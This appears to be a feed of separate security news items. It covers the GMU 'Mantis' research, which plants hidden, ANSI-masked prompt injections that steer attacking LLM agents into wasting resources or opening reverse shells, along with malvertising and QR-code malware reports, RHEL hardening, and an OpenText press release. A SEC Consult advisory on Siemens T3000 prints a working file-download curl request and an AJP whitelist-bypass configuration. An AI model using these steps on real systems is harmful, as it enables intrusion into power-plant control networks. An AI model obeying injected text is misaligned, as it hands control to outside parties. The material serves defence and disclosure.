Experimental counter-offensive system responds to malicious AI probes with their own surreptitious prompt-injection commands.

Source: Valentin Baciu via Shutterstock

Companies worried about cyberattackers using large-language models (LLMs) and other generative AI systems that automatically scan and exploit their systems could gain a new defensive ally — a system capable of subverting the attacking AI.

Dubbed Mantis, the defensive system uses deceptive techniques to emulate targeted services and — when it detects a possible automated attacker — sends back a payload that contains a prompt-injection attack. The counterattack can be made invisible to a human attacker sitting at a terminal and will not affect legitimate visitors who are not using malicious LLMs, according to the paper penned by a group of researchers from George Mason University.

Because LLMs used in penetration testing are singularly focused on exploiting targets, they are easily co-opted, says Evgenios Kornaropoulos, an assistant professor of computer science at GMU and one of the authors of the paper.

"As long as the LLM believes that it's really close to acquiring the target, it will keep trying on the same loop," he says. "So essentially, we are kind of exploiting this vulnerability — this greedy approach — that LLMs take during these penetration-testing scenarios."

Cybersecurity researchers and AI engineers have proposed a variety of novel ways for LLMs to be used by attackers. From the ConfusedPilot attack, which uses indirect prompt injection to attack LLMs when they are ingesting documents during retrieval-augmented generation (RAG) applications, to the CodeBreaker attack, which causes code-generating LLMs to suggest insecure code, attackers have automated systems in their sights.

Yet, research on offensive and defensive uses of LLMs is still early: AI-augmented attacks are essentially automating the attacks that we already know about, says Dan Grant, principal data scientist at threat-defense firm GreyNoise Intelligence. Yet, signs of increasing use of automation among attackers is increasing: the volume of attacks has been slowly increasing in the wild and the time to exploit a vulnerability has been slowly decreasing.

"LLMs enable an extra layer of automation and discovery that we haven't really seen before, but \[attackers are\] still applying the same route to an attack," he says. "If you're doing a SQL injection, it's still a SQL injection whether an LLM wrote it or human wrote it. But what it is, is a force multiplier."

**Direct Attacks, Indirect Injections, and Triggers**

In their research, the GMU team created a game between an attacking LLM and a defending system, Mantis, to see if prompt injection could impact the attacker. Prompt injection attacks typically take two forms. Direct prompt injection attacks are natural-language commands that are entered directly into the LLM interface, such as a chatbot or a request sent to an API interface. Indirect prompt injection attacks are statements included in documents, web pages, or databases that are ingested by an LLM, such as when an LLM scans data as part of a retrieval-augmented generation (RAG) capability.

In the GMU research, the attacking LLM attempts to compromise a machine and deliver specific payloads as part of its goal, while the defending system aims to prevent the attacker's success. An attacking system will typically use an iterative loop that assesses the current state of the environment, selects an action to advance toward its goal, execute the action, and analyze the targeted system's response.

Using a decoy FTP server, Mantis sends a prompt-injection attack back to the LLM agent. Source: "Hacking Back the AI-Hacker" paper, George Mason University

The GMU researchers' approach is to target the last step by embedding prompt-injection commands in the response sent to the attacking AI. By allowing the attacker to gain initial access to a decoy service, such as a web login page or a fake FTP server, the group can send back a payload with text that contains instructions to any LLM taking part in the attack.

"By strategically embedding prompt injections into system responses, Mantis influences and misdirects LLM-based agents, disrupting their attack strategies," the researchers stated in their paper. "Once deployed, Mantis operates autonomously, orchestrating countermeasures based on the nature of detected interactions."

Because the attacking AI is analyzing the responses, a communications channel is created between the defender and the attacker, the researchers stated. Since the defender controls the communications, they can essentially attempt to exploit weaknesses in the attacker's LLM.

**Counter Attack, Passive Defense**

The Mantis team focused on two types of defensive actions: Passive defenses that attempt to slow the attacker down and raise the cost of their actions, and active defenses that hack back and aim to gain the ability to run commands on the attacker's system. Both strategies were effective with a greater than 95% success rate using the prompt-injection approach, the paper stated.

In fact, the researchers were surprised at how quickly they could redirect an attacking LLM, either causing it to consume resources or even to open a reverse shell back to the defender, says Dario Pasquini, a researcher at GMU and the lead author of the paper.

"It was very, very easy for us to steer the LLM to do what we wanted," he says. "Usually, in a normal setting, prompt injection is a little bit more difficult, but here — I guess because the task that the agent has to perform is very complicated — any kind of injection of prompt, such as suggesting that the LLM do something else, is \[effective\]."

By bracketing a command to the LLM with ANSI characters that hide the prompt text from the terminal, the attack can happen without the knowledge of a human attacker.

**Prompt Injection is the Weakness**

While attackers who want to shore up the resilience of their LLMs can attempt to harden their systems against exploits, the actual weakness is the ability to inject commands into prompts, which is a hard problem to solve, says Giuseppe Ateniese, a professor of cybersecurity engineering at George Mason University.

"We are exploiting those something that is very hard to patch," he says. "The only way to solve it for now is to put some human in the loop, but if you put the human in the loop, then what is the purpose of the LLM in the first place?"

In the end, as long as prompt-injection attacks continue to be effective, Mantis will still be able to turn attacking AIs into prey.

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

AI About-Face: 'Mantis' Turns LLM Attackers Into Prey

A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked into installing…

A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked into installing malicious Chrome browser extensions.

Cybersecurity researchers at Bitdefender have uncovered a malicious advertising (malvertising) campaign that exploits **Meta’s advertising platform** to distribute malware on Facebook. This campaign, detected on November 3, 2024, disguises the malware as a security update for the popular **Bitwarden password manager**. Although the campaign has been taken down, experts warn that similar threats are likely to resurface.

****From Malicious Facebook Ads to Fake Chrome Store****

The campaign uses **deceptive Facebook ads** that appear to be legitimate security updates for Bitwarden. These ads warn users about the risk of compromised passwords and trick them into installing an urgent security update for the password manager. The ads are designed to look authentic, using Bitwarden’s branding and language to create a sense of urgency.

When users click on these ads, they are redirected through a series of websites before reaching a phishing page that mimics the official Chrome Web Store. This final page notifies users to install a **malicious browser extension** disguised as a Bitwarden update. The installation process involves downloading a zip file from Google Drive, unzipping it, and manually loading the extension into the browser.

According to Bitdefender’s **blog post** shared with Hackead.com heard of its publishing on Monday, once installed, the malicious Chrome extension requests permissions, enabling it to intercept and exploit the user’s online activities.

Some key permissions requested include access to all websites, modification of network requests, and access to storage and cookies. The extension’s manifest file reveals these permissions, indicating its ability to perform various malicious activities.

Researchers noted that the core of the attack lies within the background.js script, which activates upon installation. This script performs several critical tasks data exfiltration which the collected data is sent to a Google Script URL acting as a command-and-control server, cookie harvesting which allows attackers to search for Facebook cookies, particularly the c_user cookie containing the user’s Facebook ID. The script also gathers IP address and geolocation data and extracts personal and business information from Facebook using the Graph API.

Malicious Facebook ads (left) – Malicious Chrome extension (right) – Screenshot via Bitdefender

****Impacted Users****

The malware’s primary targets are Facebook business accounts putting unsuspected individuals and organizations at risk. The malvertising campaign has already reached thousands of users, primarily in Europe, with the possibility to expand globally.

If you use Facebook for business purposes and manage a business account, it’s important to stay cautious. If you come across a malicious ad prompting you to install updates, avoid clicking on it. Instead, visit the official website of the product to verify and access legitimate security updates.

1.  Fake Ads Manager Software Target Facebook Accounts
2.  Fake LastPass Password Manager App Lurks on iOS App Store
3.  Fake League of Legends Download Ads Spread Lumma Stealer
4.  PasswordState password manager’s update hijacked to drop malware
5.  Fake Meta Ads Hijack Facebook Accounts to Spread SYS01 Infostealer

Facebook Malvertising Campaign Spreads Malware via Fake Bitwarden

A QR code in a physical letter is a method of spreading malware that may find its way to your mailbox too.

Physical letters that contain a QR code to trick people into downloading malware are being sent through the mail, according to a warning issued by The Swiss National Cyber Security Centre (NCSC).

The letters are sent as if they come from the official Swiss Federal Office of Meteorology and Climatology (MeteoSwiss) and they urge the recipient to install a new “severe weather app.”

This app, however, does not exist, and the letters do not come from MeteoSwiss either.

Scanning the QR code in the malicious letters leads to a banking Trojan known as Coper, but also referred to as Octo2. Coper is a Malware-as-a-Service which “customers” can spread as they see fit, but they pay for the use of the malicious software and the underlying infrastructure. These customers are running campaigns targeting Europe, the US, Canada, the Middle East, Singapore, and Australia.

Coper is a sophisticated banking Trojan that has several advanced features:

*   Device Takeover (DTO) capabilities for remote control
*   Advanced obfuscation techniques to avoid detection
*   Overlay attacks aimed at credential theft

The fake “meteorology app” for this malware campaign is disguised under the name “AlertSwiss” when installed on Android devices, but Coper cybercriminals can customize these names for all other campaigns. That adaptability makes for a more convincing lure depending on which country or region is being targeted. For instance, “AlertSwiss” is a clear attempt to fake the name of an official app from the Federal Office for Civil Protection which is used by federal and cantonal agencies to inform, warn, and alert the population. That real app’s name is “Alertswiss” (note the tiny difference).

Using QR codes in snail mail offers the criminals a few advantages. People may not expect to end up with their device infected by something as non-technical as a physical letter. And QR codes get typically read by mobile devices, which—unfortunately—still get overlooked when it comes to installing security software.

QR codes are becoming more common, especially after the COVID-19 pandemic which pushed many restaurants into using digital menus instead of physical menus that are shared between customers (in the earliest days of COVID lockdowns, science was still emerging on the risk levels of touching shared objects). Because of so much change in the past few years, seeing a QR code in a letter from an official institution does not trigger any alarm bells anymore.

And many Android users suffer from either a “patch gap” or are even using Android versions that are no longer supported, so will never receive another security update. One of the main causes for a patch gap is the time it takes a fix for a known vulnerability to trickle down from software vendor to individual device manufacturers, which then need to make it available for the users.

**Security advice**

*   Keeping your device up to date protects you from known vulnerabilities and helps you to stay safe.

We have found that many users have no idea whether their devices are still receiving updates. You can find your device’s Android version number, security update level, and Google Play system level in your Settings app. You’ll get notifications when updates are available for you, but you can also check for them yourself.

For most phones it works like this: Under **About phone** or **About device** you can tap on **Software updates** to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device.

*   Scan a QR code with the same security mindset as clicking a link

If you scan a QR code, make sure to use an app that shows you the full URL and asks you first before it visits the URL encoded in the QR code. If you do not trust the URL, don’t allow your device to open the link and, if necessary, research to find another, more trustworthy, way to get the information or download you want. Modern Android devices (version 8 and above) have a native QR code scanning capability built into the camera app. Some QR code scanner apps may have a feature that automatically executes actions like opening a website or downloading a file. Disable such features.

*   Use anti-malware protection on your devices

Your mobile devices are in need of protection just as much as your computer. Malwarebytes offers customers Malwarebytes for Android and Malwarebytes for iOS. Malwarebytes detects Coper as Android/Trojan.Banker.Ink.a.

 Malicious QR codes sent in the mail deliver malware 

Security is important in enterprise scenarios, where core business applications need to run seamlessly but are often connected to the external world where they are vulnerable to attack.Malware, unauthorized access to files and execution of unverified code are just some examples of how system security can be compromised, not only by exploiting known bugs and vulnerabilities, but also by the lack of appropriate countermeasures.Red Hat Enterprise Linux (RHEL) can help, as it provides some tools and services that can natively support the process of system hardening to help make your system more se

Security is important in enterprise scenarios, where core business applications need to run seamlessly but are often connected to the external world where they are vulnerable to attack.

Malware, unauthorized access to files and execution of unverified code are just some examples of how system security can be compromised, not only by exploiting known bugs and vulnerabilities, but also by the lack of appropriate countermeasures.

Red Hat Enterprise Linux (RHEL) can help, as it provides some tools and services that can natively support the process of system hardening to help make your system more secure.

In this article, we explore some of the tools included in RHEL that will help you start hardening your systems to better prevent access to files, processes and applications.

****Implementing access control with SELinux****

Many RHEL customers and users have experienced issues when trying to run custom applications, operating on standard folders and locations of common processes, or even just trying to open ports for their web services.

In 99% of these cases, the "issues" were caused by Security-Enhanced Linux (SELinux).

SELinux comes enabled by default in RHEL and it is a security framework that helps system administrators implement Mandatory Access Control (MAC) instead of Discretionary Access Control (DAC). MAC takes into account access modes, groups and users that can operate on files, folders and applications. Additionally, it implements a complex set of access rules, based on labels and types, that uniquely identify which processes can access specific files, folders and ports.

****MAC example****

Let's look at httpd as an example:

*   Httpd runs with a default SELinux type of **httpd\_d**
*   The folder /var/www/html/ has **httpd\_sys\_content\_t**
*   SELinux expects the process to access specific ports (80, 443, 8080, 8443 among others) and has assigned those ports a specific label, **http\_port\_t**

Suppose we try to run httpd with a different folder (i.e. /var/www/my\_site) and a different port (i.e. 4449). When we try to start the httpd service, SELinux will prevent it until we manually add the new folder and the chosen port to the labels mentioned above.

Rules for most of the applications and processes that are shipped with RHEL are already established, but they can be customized and extended to match your needs, so you can adapt them to custom applications.

Out of the box, RHEL offers a dedicated system role for Ansible that will simplify and automate the operations involving SELinux labeling and verification.

****Preventing non-standard applications from running in your environment with fapolicyd****

With SELinux we can control how processes can access files, folders and ports, but what if we want to make sure that only what comes with the RHEL can be executed?

fapolicyd is a lightweight security framework that includes a daemon whose role is to make sure that only applications that are installed as trusted RPMs can be executed.

This is possible because fapolicyd uses a specific database and a set of rules that keeps track of packages and their content that are installed using the package manager (and are present in the RPM database), so those, and only those, can be executed.

With fapolicyd installed and running in your RHEL machine, trying to create and run a Bash script or move and run the default applications present in the /usr/bin or /bin folders elsewhere in the system will result with a permission denied error.

Similar to SELinux, fapolicyd comes with a set of predefined rules that can be easily extended to match your operative requirements, also covering rules for scripts, MIME types and more.

By default, fapolicyd operates on byte size of the executable, but it can also support integrity checking.  This means that even if an attacker manages to replace an executable with a malicious version that's the same size, fapolicyd can still prevent it from running.

This is crucial when it comes to preventing unwanted applications such as rootkits, malware or any other harmful executables from running and disrupting your system.

****Intrusion detection made simple - AIDE, IMA and EVM****

One of the most common attack vectors is when existing files and processes are altered to inject malicious code or configurations, making the system vulnerable to attacks or exploits.

Advanced Intrusion Detection Environment (AIDE) is a tool, included in RHEL, that enables integrity checks for the whole system, maintaining an updated database of all files and folders to track any added or removed files, location changes or other suspicious activity.

The database can be updated using a cron job, so it is always up-to-date and aligned with the current system status.

RHEL also supports a lower-level Integrity Measurement Architecture (IMA) that is implemented at kernel level. This supports creating and maintaining hashes of all local files, and can implement a runtime check using a kernel hook to prevent executing and/or accessing files that have been altered or have failed verification checks.

If used in combination with the Extended Verification Module (EVM) kernel module, the kernel can also perform checks on the extended attributes of files, drastically reducing the chances that any modification performed by a malicious entity can compromise the integrity of the system.

****Wrap up****

The tools we discussed here are just some of the utilities and frameworks that RHEL includes to improve system security and integrity.

In a previous article, we also covered how Red Hat Insights, the SaaS (Software as a Service) solution hosted on Red Hat Console can be used to detect malware in systems.

Please don’t hesitate to contact us if you would like to learn more!

****Further reading****

*   Enhancing security with the Kernel integrity subsystem
*   RHEL Security hardening

Hardening your operating system? Red Hat Enterprise Linux to the rescue!

Siemens Energy Omnivise T3000 version 8.2 SP3 suffers from local privilege escalation, cleartext storage of passwords in configuration and log files, file system access allowing for arbitrary file download, and IP whitelist bypass.

    SEC Consult Vulnerability Lab Security Advisory < 20241112-0 >=======================================================================              title: Multiple vulnerabilities            product: Siemens Energy Omnivise T3000 vulnerable version: >=8.2 SP3      fixed version: see solution section         CVE number: CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879             impact: High           homepage: https://www.siemens-energy.com/global/en/home/products-services/product/omnivise-t3000.html              found: 2024-06-02                 by: Steffen Robertz (Office Vienna)                     Andreas Kolbeck (Office Munich)                     SEC Consult Vulnerability Lab                     An integrated part of SEC Consult, an Eviden business                     Europe | Asia                     https://www.sec-consult.com=======================================================================Vendor description:-------------------"Located in 90 countries, Siemens Energy operates across the whole energy landscape.From conventional to renewable power, from grid technology to storage to electrifyingcomplex industrial processes.Our mission is to support companies and countries with what they need to reducegreenhouse gas emissions and make energy reliable, affordable, and more sustainable.Let’s energize society."Source: https://www.siemens-energy.com/global/en/home/company/about.htmlBusiness recommendation:------------------------Siemens has released their security advisory SSA-857368, see the following URLfor further details:https://cert-portal.siemens.com/productcert/html/ssa-857368.html#mitigations-sectionFollow the mitigation instructions communicated in Omnivise T3000 Technical News 2024-089and SE Controls Security Announcement 2024-01.SEC Consult highly recommends to perform a thorough security review of the productconducted by security professionals to identify and resolve potential furthersecurity issues.Vulnerability overview/description:-----------------------------------1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)Insecurely configured services or the insecure configuration of their authorizationslead to privilege escalation vulnerabilities in the Windows operating system. It ispossible for a low-privileged user to modify a service in such a way that it executesarbitrary code instead of starting the actual service. The service path is writable bythe "Authenticated Users" group.Precondition for exploitation: requires authenticated local access to the Terminal Serverof the T3000 system.2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)Multiple files containing cleartext passwords were discovered. These can be usedto jump from host to host and thus compromise the whole security architecture ofthe T3000 system.Precondition for exploitation: requires administrative local access to any server of theT3000 system.3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)The RemoteDiagnosticView application is a web application hosted on the applicationserver. One parameter accepts a full path, which can be abused to download arbitraryfiles.Precondition for exploitation: requires administrative remote access to the Applicationserver of the T3000 system.4) IP Whitelist Bypass (CVE-2024-38879)The application server is hosting the T3000 web application on port 8080. However,only the Terminal Server is whitelisted. This whitelisting can be circumvented byexploiting the additionally exposed Tomcat AJP service on port 8009.Precondition for exploitation: requires unauthenticated remote access to the Applicationserver of the T3000 systemProof of concept:-----------------1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)The following path hosts a file that is used by the "DSGW Service" of the T3000 system:"E:\dsgw\gw\bin\dsgwservice.exe"The path is writable by the "Authenticated Users" group.2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)Multiple files containing cleartext passwords were discovered.Terminal Server:* C:\Program Files\SPPA-T3000\snmpv3trap\Config.properties (only readable by Admin)* E:\DSGW\GW\config_PDC.properties (Passwords are Base64 encoded)* C:\Program Files\SPPA-T3000\Logs\AppInstallLogs\PostInstallConfigList.xml (Readable by every user)Application Server:* D:\SPPA-T3000\_framework\_jre\installvariables.properties (contains passwords of tomcat and MySQL service* D:\SPPA-T3000\Orion\install\_uninstall\installvariables.properties (contains password for MySQL service and installation)All Servers:All servers are being deployed via Puppet. However, the cache file is nevercleared and contains the initial passwords of all systems of the T3000 system:"C:\Program Data\PuppetLabs\puppet\cache\client_data\catalog\<uid.json>"---------------------------------------[...]"parameters": {"foreman_pass": "[redacted]","foreman_url": "[redacted]","foreman_user": "puppet_provider","is_sec": "true","mpssvc_pass": "[redacted]"}[...]"parameters": {"crsphost": "XXX.XXX.XXX.XXX","crsppswd": "","crsprepo": "AVPatterns","crspservice": "SFTP","crspuser": "siem_t3000_west","primary_ts": true}[...]"parameters": {[...]"snmpv3_authpass": "[redacted]","snmpv3_privpass": "[redacted]","snmpv3_user": "snmpuser","snmpv3_hash": "SHA","snmpv3_encrypt": "AES"}[...]"parameters": {[...]"cyg_server_passwd": "[redacted]",[...]"fst_appsrv_passwd": "","fst_appsrv_red_hgw_ip": "XXX.XXX.XXX.XXX",[...]"icmauser_passwd": "[redacted]",[...]"opcadmin_passwd": "[redacted]","operator01_passwd": "[redacted]","operator02_passwd": "[redacted]","operator03_passwd": "[redacted]","operator04_passwd": "[redacted]","operator05_passwd": "[redacted]","operator06_passwd": "[redacted]","operator07_passwd": "[redacted]","operator08_passwd": "[redacted]","operator09_passwd": "[redacted]","operator10_passwd": "[redacted]","operators_password": "[redacted]","pdm01_passwd": "[redacted]","pdm02_passwd": "[redacted]","pdm03_passwd": "[redacted]","pdm04_passwd": "[redacted]","pdm05_passwd": "[redacted]","pdm06_passwd": "[redacted]","pdm07_passwd": "[redacted]","pdm08_passwd": "[redacted]","pdm09_passwd": "[redacted]","pdm10_passwd": "[redacted]","pmas_passwd": "[redacted]","pmsvc_passwd": "[redacted]","pmts_passwd": "[redacted]","reparchive_passwd": "[redacted]",[...]"t3kservice_passwd": "[redacted]","[...]"tomcatadmin_passwd": "[redacted]","tsuser01_passwd": "[redacted]","tsuser02_passwd": "[redacted]","tsuser03_passwd": "[redacted]","tsuser04_passwd": "[redacted]","tsuser05_passwd": "[redacted]","tsuser06_passwd": "[redacted]","tsuser07_passwd": "[redacted]","tsuser08_passwd": "[redacted]","tsuser09_passwd": "[redacted]","tsuser10_passwd": "[redacted]","txpdomain_passwd": "[redacted]",[...]"vm_r8_passwd": "[redacted]",[...]"vm_tc_passwd": "[redacted]",[...]"vm_ts_passwd": "[redacted]",[...]"vm_whitelist_hostname": "","vm_whitelist_passwd": "","wbuser01_passwd": "[redacted]","wbuser02_passwd": "[redacted]","wbuser03_passwd": "[redacted]","wbuser04_passwd": "[redacted]","wbuser05_passwd": "[redacted]","wbuser06_passwd": "[redacted]","wbuser07_passwd": "[redacted]","wbuser08_passwd": "[redacted]","wbuser09_passwd": "[redacted]","wbuser10_passwd": "[redacted]","wra01_passwd": "[redacted]",[...]"dsrm_passwd": "[redacted]",[...]"dc_passwd": "[redacted]",[...]"patchsvc_passwd": "[redacted]",}--------------------------------------------------To understand the impact of this file, we have to explain a little about the T3000 system.The system is split into three levels: Operator, Automation and Process.Operator Level: This is the level, where thin clients are situated. In our testcase,this level consisted of the Terminal Server that engineers could connect to. From here,they start the T3000 application, which simply loads a browser and displays a Javaapplication served from the Application Server.Automation Level: This level consists of application and automation servers. The applicationserver hosts the not time critical components of power generations such as the web server.The automation servers are taking care of time critical operations. In our testcase thesewere PLCs from the SIMATIC S7-CPU family.Process Level: This level consists of the I/O modules that are controlled by the automationservers.The Terminal Server, located on the operator level already contained the Puppet cache file,which contained all the local Windows users used in the T3000 system in clear text. As theTerminal Server communicates with the Application Server, they have to be connected via network.Thus, the attacker can use the credentials on the Terminal Server to jump to the ApplicationServer. This server is in the same segment as the physical PLC CPUs. Thus an attacker can nowalso control the PLCs and thus the whole power plant.In order to read the Puppet cache file, an attacker has to gain local admin rights first.For this, vulnerability 1 can be used.3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)The RemoteDiagnosticView website is hosted at the following URL:http:// <IP Application Server>:8080/RemoteDiagnosticViewIn our testcase it was configured using default credentials with the following username andan easy to guess password:txpadmin:[redacted]Using these credentials an attacker gains an authenticated session. From there, one cansimply download arbitrary files:------------------------Curl -H "Cookie: JSESSIONID=31B4F2F1BAFC473AB41B65DDF2FD10BA;" -I -H "Content-Type:application/x-www-form-urlencoded" -X POST -d "filename=D:\sectest.txt&type=TEXT"http://$host:8080/RemoteDiagnosticView/DataServletHTTP/1.1 200Content-Type: text/plainTransfer-Encoding: chunked[...]Sectest---------------------------------4) IP Whitelist Bypass (CVE-2024-38879)The AJP protocol can be used to proxy requests from an Apache server to an applicationrunning on Tomcat. By setting up a local Apache server and configuring it to use theAJP service of the Application Server, the IP filter is circumvented.The following setup was built:------------------------------sudo apt-get install libapache2-mod-jksudo vim /etc/apache2/apache2.conf# append the following line to the config   Include ajp.confsudo vim /etc/apache2/ajp.conf# create the following file    ProxyRequests Off    <Proxy *>       Order deny,allow       Deny from all       Allow from localhost    </Proxy>    ProxyPass   / ajp://<Application Server IP>:8009/   ProxyPassReverse   / ajp://<Application Server IP>:8009/sudo a2enmod proxy_httpsudo a2enmod proxy_ajpsudo systemctl restart apache2--------------------------Afterwards, the e.g. RemoteDiagnosticView can be loaded from http://127.0.0.1/RemoteDiagnosticViewVulnerable / tested versions:-----------------------------The following version has been tested which was the latest version availableat the time of the test:* 8.2According to the vendor (T3000 SE Controls Security Announcement 2024/01 Update 1),the following versions and components are affected:All T3000 Versions >= Release 8.2 SP3:* Security Server* Thin Clients* Terminal Server* Application Server* Domain Controller* PDM VM* Whitelisting VM* NIDSVendor contact timeline:------------------------2024-06-05: Contacting vendor through productcert@siemens.com2024-06-06: Siemens assigned S-PCERT#408502024-06-12: Reaching out to specific contacts at Siemens Energy Cybersecurity.2024-06-13: They confirm that ProductCERT will get back to us once they have a timeline.2024-06-19: Customer informs us about a Siemens Energy Document that recommends to            change passwords after installation. The document is called "SE Controls            Security Announcement 2024/01" but only available to T3000 customers.2024-06-20: Sending feedback about the document to Siemens Energy Cybersecurity            as in our opinion it does not solve the issues.2024-06-20: They confirm again that ProductCERT is taking care of issues. Asks            to confirm that we received their messages, which we didn't -> Realized            that one of our email addresses was dropped during the communication,            recovered emails from second account.2024-06-17/2024-06-24: ProductCERT informs:            Vulnerability 1 cannot be reproduced in the reference installation.                 The product team is working to find potentially affected installation                 scenarios.            Vulnerability 2 was reproduced and the product team is working on a mitigation.                 Also, a related customer information has been distributed to customers.            Vulnerability 3 will be fixed in the next release of the T3000 distribution            Vulnerability 4 is already fixed in the current version. The product team is                 investigating, if this vulnerability is present in still supported versions.2024-06-21: ProductCERT informs us that they are able to reproduce all of the vulnerabilities            and provide fixes for most of them. Advisory draft should be shared with            SEC Consult next week. Ask to keep communication directed at ProductCERT            instead of Cybersecurity team.2024-06-28: ProductCERT sends over advisory draft. Could reproduce all vulnerabilities            and requested CVEs.2024-07-03: Siemens ProductCERT requests if we received the draft, as SEC Consult didn't answer yet.2024-07-03: SEC Consult confirms the reception of the advisory draft.2024-07-04: Submitted feedback for advisory draft to ProductCERT. From SEC Consult's            understanding, changing passwords after initial installation only fixes the            cleartext passwords in log files. The puppet issue would not be fixed.            Thus SEC Consult proposed to split Vulnerability 2 into two separate findings.2024-07-05: ProductCERT forwarded feedback to product team.2024-08-02: ProductCERT publishes SSA-857368.2024-08-05: Informing ProductCERT of vacation/absences, will coordinate further afterwards.2024-10-03: Proposing a meeting with ProductCERT to clarify and discuss all open issues.2024-10-22: Meeting with ProductCERT.2024-10-24: ProductCERT sends us further documents for T3000 regarding fixes/mitigations.2024-10-31: Sending advisory draft to ProductCERT, proposing advisory release date for 7th            November.2024-11-06: Receiving feedback from ProductCERT, postponing release to 12th November.2024-11-12: Coordinated release of advisory.Solution:---------Change the passwords to all components. Detailed instructions and patch informationcan be found when following Omnivise T3000 Technical News 2024-089 and SE ControlsSecurity Announcement 2024-01.Release 9.2 Fix / Mitigations:Issue 1 (CVE-2024-38876)* System Software Patch 22.173.20* System Software Patch 22.173.52* Application Software Patch 09.0.19.06Issue 2 (CVE-2024-38877)* System Software Patches 22.173.52* Application Software Patch 09.0.19.06* Technical News 2024-089Issue 3 (CVE-2024-38878)* Application Software Patch 09.0.19.06Issue 4 (CVE-2024-38879)* Application Software Patch 09.0.19.06Release 8.2 SP4 Fix / Mitigations:Patches are currently under development.Release 8.2 SP3 Fix / Mitigations:Currently no fixes are planned, but see Technical News 2024-089 for issue 2 (CVE-2024-38877)Workaround:-----------Limit access to the terminal servers.CVE-2024-38877: If the passwords are suspected to be compromised, change the passwordsfor all computers and service accounts. In addition follow the instructions fromOmnivise T3000 Technical News 2024-089, which is available through T3000 customerservice and applies to releases 8.2 SP3/SP4 and 9.2.Advisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF Steffen Robertz, Andreas Kolbeck/ @2024

Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download

PRESS RELEASE

WATERLOO, ON, Oct. 31, 2024 /PRNewswire/ -- OpenText (NASDAQ: OTEX), (TSX: OTEX), has revealed its highly anticipated "Nastiest Malware of 2024" list, spotlighting the year's most notorious cyber threats. Now in its seventh year, OpenText's cybersecurity experts have identified the most relentless and adaptive malware trends impacting industries worldwide. This year, ransomware aimed at critical infrastructure takes center stage, highlighting an urgent call for reinforced security to protect vital services. In response, organizations are projected to increase their cybersecurity investments by 14.3% in 2024, reaching more than $215 billion.

Once again, ransomware group LockBit secures the #1 spot as the nastiest malware of the year. Known for its resilience and relentless pursuit of critical targets, LockBit has successfully dodged multiple law enforcement crackdowns. According to the FBI's 2023 2023 Internet Crime report, LockBit was reported in 175 attacks on critical infrastructure, underscoring its staying power and adaptability. The ongoing standoff between the FBI and LockBit shows the gritty persistence of today's ransomware market and its growing sophistication. For several months now, the battle for dominance between the FBI and LockBit has highlighted the persistence of the ransomware market and how as technology evolves these threats continually lurk in the shadows.    

"Ransomware attacks on critical infrastructure are on the rise, and cybercriminals are increasingly using artificial intelligence to develop highly personalized threats, which significantly endangers national security and public safety," said Muhi Majzoub, EVP and Chief Product Officer, OpenText. "However, the increased attention on ransomware and cybersecurity is encouraging, as more organizations are proactively prioritizing cybersecurity investments. This commitment highlights their dedication to safeguarding essential services from evolving threats." The 2024 list showcases how adaptive and innovative each ransomware is, but also how well these threats push boundaries. With their malicious capabilities and evasiveness, these cybercriminals continue to find new ways to surpass our darkest expectations.

2024's Nastiest Malware Hall of Infamy: 

1.  LockBit: This ransomware-as-a-service (RaaS) heavyweight leads the pack again, unfazed by FBI efforts to take it down. LockBit's aim? Target one million businesses before calling it quits, solidifying its spot as a top ransomware menace in 2024.
    
2.  Akira: A fresh and ferocious entry, Akira brings a splash of '80s aesthetics to the dark web, quickly climbing the ranks with ruthless encryption tactics and swift deployment. It's especially active in healthcare, manufacturing, and finance, cementing itself as a go-to Ransomware-as-a-Service (RaaS) model for affiliates.
    
3.  RansomHub: Rumored to be a descendant of the Black Cat (ALPHV) group, RansomHub burst onto the scene targeting high-profile organizations. After attacking Planned Parenthood, this group made headlines by stealing and ransoming sensitive patient data, threatening public exposure.
    
4.  Dark Angels: Known for its laser-focused, high-impact attacks on top-tier targets, Dark Angels doesn't hold back. Using advanced infiltration methods, they've secured ransom payments as high as $75 million, leaving their mark on one of the year's biggest Fortune 50 attacks.
    
5.  Redline: Not ransomware but still formidable, Redline Stealer specializes in stealing credentials and sensitive information with skillful evasion tactics, making it a persistent headache across various sectors.
    
